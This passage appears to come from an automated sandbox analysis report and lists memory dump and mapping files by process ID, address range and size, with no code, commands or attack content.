- memory/3064-221-0x0000000000400000-0x0000000000406000-memory.dmp (Filesize 24KB)
- memory/3064-219-0x0000000000401108-mapping.dmp
- memory/3116-227-0x0000000000400000-0x0000000000431000-memory.dmp (Filesize 196KB)
- memory/3116-222-0x0000000000401000-mapping.dmp
- memory/3128-114-0x0000000000000000-mapping.dmp
- memory/3216-229-0x0000000000000000-mapping.dmp
- memory/3356-216-0x0000000000400000-0x0000000000413000-memory.dmp (Filesize 76KB)
- memory/3356-212-0x0000000000401000-mapping.dmp
- memory/3536-149-0x0000000000000000-mapping.dmp
- memory/3660-232-0x0000000000000000-mapping.dmp
- memory/3836-132-0x0000000000000000-mapping.dmp
- memory/4064-228-0x0000000000000000-mapping.dmp